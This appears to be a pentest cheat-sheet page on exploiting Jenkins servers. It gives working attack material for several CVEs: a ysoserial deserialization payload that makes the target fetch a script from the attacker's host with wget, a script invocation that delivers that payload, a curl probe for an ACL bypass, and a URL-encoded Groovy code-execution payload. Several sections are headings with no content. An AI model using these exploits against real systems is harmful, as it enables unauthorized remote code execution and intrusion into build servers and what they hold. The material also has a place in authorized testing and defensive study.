search

Jenkins Common Bugs

hashtag
Introduction

What would you do if you came across a website that uses Jenkins?

hashtag
How to Detect

Usually in the HTTP response there is a header like this X-Jenkins

  1. Find the related CVE by checking jenkins version

  • How to find the jenkins version

By checking the response header X-Jenkins, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at pwn_jenkinsarrow-up-right

Some example CVE:

  • Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)

Use ysoserialarrow-up-right to generate a payload. Then RCE using this scriptarrow-up-right:

java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
./jenkins_rce.py jenkins_ip jenkins_port payload.out

  • Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)

Details herearrow-up-right.

If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:

curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a

Alternative RCE with Overall/Read and Job/Configure permissions herearrow-up-right.

  • CheckScript RCE in Jenkins (CVE-2019-1003030)

How to Exploit:

URL Encoding the following for RCE

to

%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d

  1. Default Credentials

  1. Unauthenticated Jenkins Dashboard

hashtag
Reference

PreviousHAProxy Common BugsNextJira Common Bugs

Last updated